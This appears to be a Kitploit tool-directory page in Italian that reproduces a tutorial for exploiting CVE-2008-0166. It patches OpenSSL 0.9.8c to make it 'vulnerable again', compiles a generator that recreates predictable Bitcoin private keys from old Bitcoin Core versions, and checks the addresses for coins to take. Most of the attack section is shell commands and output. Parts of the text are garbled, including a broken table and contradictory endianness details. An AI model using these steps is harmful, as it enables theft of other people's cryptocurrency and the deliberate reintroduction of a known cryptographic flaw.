Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/demining/vulnerable-to-debian-openssl-bug-cve-2008-0166
Analisi delle VulnerabilitàExploitCrittografiaPaper e RicercaApprendimento e FormazioneRisorse Curate
GitHubdemining/vulnerable-to-debian-openssl-bug-cve-2008-0166

Vulnerable-to-Debian-OpenSSL-bug-CVE-2008-0166

Cerca monete BTC nelle versioni precedenti di Bitcoin Core con la vulnerabilità critica OpenSSL 0.9.8 CVE-2008-0166

Vedi RepositorySito web
92343 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Ricerca di monete BTC nelle versioni precedenti di Bitcoin Core con la vulnerabilità critica OpenSSL 0.9.8 CVE-2008-0166

In questo articolo creeremo uno strumento che genererà Indirizzi Bitcoin (P2PKH) utilizzando la vulnerabilità CVE-2008-0166. Questo è un progetto di ricerca per trovare monete BTC nelle versioni precedenti del client software Bitcoin Core.

Generatore di numeri casuali che genera  numeri prevedibili  CVE-2008-0166

VAIM-OpenSSL 0.9.8/1.0.0 Rilevato

La versione con vulnerabilità critica  OpenSSL 0.9.8 CVE-2008-0166 era  popolata solo con l'ID di processo. A causa delle differenze tra endianness e sizeof(long), l'output dipende dall'architettura:  32 bit big endian (ad esempio,  i386),  64 bit big endian (ad esempio,  amd64, ia64),  32 bit big endian (ad esempio, powerpc , sparc). PID 0 è il core, e   (  ) non viene raggiunto tramite porting, quindi c'erano    possibili flussi di numeri casuali per ogni architettura.

| Data di rilascio | Versione | Tutto verrà memorizzato nell'archivio file di Google Drive «Ubuntu 18.04.5LTS» installa g++ installa i pacchetti libgmp3-dev libmpfr-dev cryptodeepbtcgen creato con successo! Esegui cryptodeepbtcgen Verifica della chiave privata sul sito web bitaddress
PID_MAX
32768
32767
Ricerca di monete BTC nelle versioni precedenti di Bitcoin Core con la vulnerabilità critica OpenSSL 0.9.8 CVE-2008-0166

Il client software Bitcoin Core utilizza  OpenSSL. Nello specifico, utilizza una funzione  «EC_KEY_generate_key()» per generare Indirizzi Bitcoin  (come una chiave)  per ricevere pagamenti. Le versioni precedenti di Bitcoin Core generano e memorizzano  100  chiavi in wallet.dat

Una nuova chiave viene generata solo quando viene ricevuto un pagamento Bitcoin. Pertanto, il client software Bitcoin Core mantiene un pool di  100  chiavi Bitcoin inutilizzate  (indirizzi) . Lo stato del generatore interno di numeri casuali dipende da quali altre chiamate sono state effettuate alla libreria  OpenSSL prima della chiamata 'EC_KEY_generate_key()' . Chiamate che influenzano lo stato interno del RNG: «RAND_add(8)», «RAND_bytes(8)» и «RAND_bytes(32)».

Quindi la ricerca consisteva nell'esaminare molte vecchie fonti di bitcoin per scoprire quali chiamate venivano effettuate che influenzavano lo stato interno del RNG prima della chiamata  «EC_KEY_generate_key()». Il percorso delle chiamate cambia tra le versioni del client software Bitcoin Core

Lo studio si è concentrato sulle seguenti versioni:

|  Data di rilascio |  Versione |

Il nostro obiettivo è generare chiavi private per ogni versione del client software Bitcoin Core, per ogni architettura  (le32/le64), per ogni ID di processo e per gli Indirizzi Bitcoin  (P2PKH), utilizzando un numero casuale da una vulnerabilità critica. OpenSSL 0.9.8.

In definitiva, creeremo un Generatore di Indirizzi Bitcoin  (P2PKH) e tutto verrà salvato in un file result.txt

Tutto verrà memorizzato nell'archivio file di Google Drive

Rendere OpenSSL di nuovo vulnerabile

Per questo useremo il  kit di distribuzione  «Ubuntu 18.04.5 LTS» da Google Colab

Ricerca di monete BTC nelle versioni precedenti di Bitcoin Core con la vulnerabilità critica OpenSSL 0.9.8 CVE-2008-0166

In precedenza abbiamo registrato  una videoguida :  «TERMINAL in Google Colab crea tutte le comodità per lavorare in GITHUB»

Apri Google Colab in  Terminal [TerminalGoogleColab]

Eseguiamo il comando:

root@kitploit:~
cat /etc/lsb-release
"Ubuntu 18.04.5 LTS"

Andiamo al  «CryptoDeepTools» repository   e diamo un'occhiata ai dettagli

root@kitploit:~
git clone https://github.com/demining/CryptoDeepTools.git

cd CryptoDeepTools/05VulnerableOpenSSL/

ls -lh
Ricerca di monete BTC nelle versioni precedenti di Bitcoin Core con la vulnerabilità critica OpenSSL 0.9.8 CVE-2008-0166

Aggiorna e installa  g++ libgmp3-dev libmpfr-dev

root@kitploit:~
apt-get update

sudo apt-get install g++ -y
installa g++
root@kitploit:~
sudo apt-get install libgmp3-dev libmpfr-dev -y
Ricerca di monete BTC nelle versioni precedenti di Bitcoin Core con la vulnerabilità critica OpenSSL 0.9.8 CVE-2008-0166
installa i pacchetti libgmp3-dev libmpfr-dev

Per rendere  OpenSSL di nuovo vulnerabile come in  CVE-2008-0166
Scarica  openssl-0.9.8c.tar.gz  e applica le patch ai file di sistema

root@kitploit:~
wget https://ftp.openssl.org/source/old/0.9.x/openssl-0.9.8c.tar.gz
Ricerca di monete BTC nelle versioni precedenti di Bitcoin Core con la vulnerabilità critica OpenSSL 0.9.8 CVE-2008-0166
Ricerca di monete BTC nelle versioni precedenti di Bitcoin Core con la vulnerabilità critica OpenSSL 0.9.8 CVE-2008-0166
root@kitploit:~
tar xfz openssl-0.9.8c.tar.gz
Ricerca di monete BTC nelle versioni precedenti di Bitcoin Core con la vulnerabilità critica OpenSSL 0.9.8 CVE-2008-0166
root@kitploit:~
mv openssl-0.9.8c openssl-0.9.8c-vuln

cd openssl-0.9.8c-vuln

Ricerca di monete BTC nelle versioni precedenti di Bitcoin Core con la vulnerabilità critica OpenSSL 0.9.8 CVE-2008-0166
root@kitploit:~
ls -lh
Ricerca di monete BTC nelle versioni precedenti di Bitcoin Core con la vulnerabilità critica OpenSSL 0.9.8 CVE-2008-0166
root@kitploit:~
patch -p1 <../make-OpenSSL-0-9-8c-vulnerable-again.diff
Ricerca di monete BTC nelle versioni precedenti di Bitcoin Core con la vulnerabilità critica OpenSSL 0.9.8 CVE-2008-0166

Nel sistema LE-64 usiamo:

root@kitploit:~
./Configure linux-x86_64 shared no-ssl2 no-ssl3 no-comp no-asm
Ricerca di monete BTC nelle versioni precedenti di Bitcoin Core con la vulnerabilità critica OpenSSL 0.9.8 CVE-2008-0166
root@kitploit:~
make depend all
Ricerca di monete BTC nelle versioni precedenti di Bitcoin Core con la vulnerabilità critica OpenSSL 0.9.8 CVE-2008-0166

Torniamo alla directory content/

root@kitploit:~
cd /

ls
Ricerca di monete BTC nelle versioni precedenti di Bitcoin Core con la vulnerabilità critica OpenSSL 0.9.8 CVE-2008-0166
root@kitploit:~
cd content/CryptoDeepTools/05VulnerableOpenSSL/

ls -lh

Ricerca di monete BTC nelle versioni precedenti di Bitcoin Core con la vulnerabilità critica OpenSSL 0.9.8 CVE-2008-0166

Compilazione:

root@kitploit:~
gcc -o cryptodeepbtcgen cryptodeepbtc.c -I./openssl-0.9.8c-vuln/include -L./openssl-0.9.8c-vuln -lssl -lcrypto

ls -lh
cryptodeepbtcgen creato con successo!
root@kitploit:~
LD_LIBRARY_PATH=./openssl-0.9.8c-vuln/ ./cryptodeepbtcgen -h
Ricerca di monete BTC nelle versioni precedenti di Bitcoin Core con la vulnerabilità critica OpenSSL 0.9.8 CVE-2008-0166

Tutte le versioni supportate del client software Bitcoin Core:

root@kitploit:~
LD_LIBRARY_PATH=./openssl-0.9.8c-vuln/ ./cryptodeepbtcgen -l
Ricerca di monete BTC nelle versioni precedenti di Bitcoin Core con la vulnerabilità critica OpenSSL 0.9.8 CVE-2008-0166
root@kitploit:~
crypto > LD_LIBRARY_PATH=./openssl-0.9.8c-vuln/ ./cryptodeepbtcgen -l
#0   - 0.3.24
#1   - 0.8.6-d
#2   - 0.8.6-qt
#3   - 0.9.1-d
#4   - 0.9.4-d
#5   - unknownA
#6   - unknownB
#7   - unknownC
#8   - unknownD
#9   - unknownE
#10  - unknownF
#11  - unknownG
#12  - unknownH
#13  - unknownI
#14  - unknownJ
#15  - unknownK
#16  - unknownA0
#17  - unknownA1
#18  - unknownA2
#19  - unknownA3
#20  - unknownA4
#21  - unknownB0
#22  - unknownB1
#23  - unknownB2
#24  - unknownB3
#25  - unknownC0
#26  - unknownC1
#27  - unknownC2
#28  - unknownD0
#29  - unknownD1
#30  - unknownD2
#31  - unknownD3
#32  - unknownD4
#33  - unknownD5
#34  - unknownE0
#35  - unknownA0x
#36  - unknownA1x
#37  - unknownA2x
#38  - unknownA3x
#39  - unknownA4x
#40  - unknownB0x
#41  - unknownB1x
#42  - unknownB2x
#43  - unknownB3x
#44  - unknownC0x
#45  - unknownC1x
#46  - unknownC2x
#47  - unknownD0x
#48  - unknownD1x
#49  - unknownD2x
#50  - unknownD3x
#51  - unknownD4x
#52  - unknownD5x
#53  - unknownE0x
crypto >

Esegui cryptodeepbtcgen -n 32 -v 0:

root@kitploit:~
LD_LIBRARY_PATH=./openssl-0.9.8c-vuln/ ./cryptodeepbtcgen -n 32 -v 0 >> result.txt
Esegui cryptodeepbtcgen

Tutto verrà salvato nell'archivio file  Google Drive come file di testo result.txt

Ricerca di monete BTC nelle versioni precedenti di Bitcoin Core con la vulnerabilità critica OpenSSL 0.9.8 CVE-2008-0166

Verifica della chiave privata!

Verifica della chiave privata sul sito web bitaddress

Successivamente, resta da controllare tutti gli Indirizzi Bitcoin generati per la presenza di monete BTC; per questo possiamo usare  lo script Python :  bitcoin-checker.py

Sorgente

Video: https://youtu.be/zHkXups2I8k

Fonte: https://cryptodeeptech.ru/vulnerable-openssl


Indirizzo per Donazioni
♥ BTC1Lw2gTnMpxRUNBU85Hg4ruTwnpUPKdf3nV
♥ ETH0xaBd66CF90898517573f19184b3297d651f7b90bf
Scarica lo strumento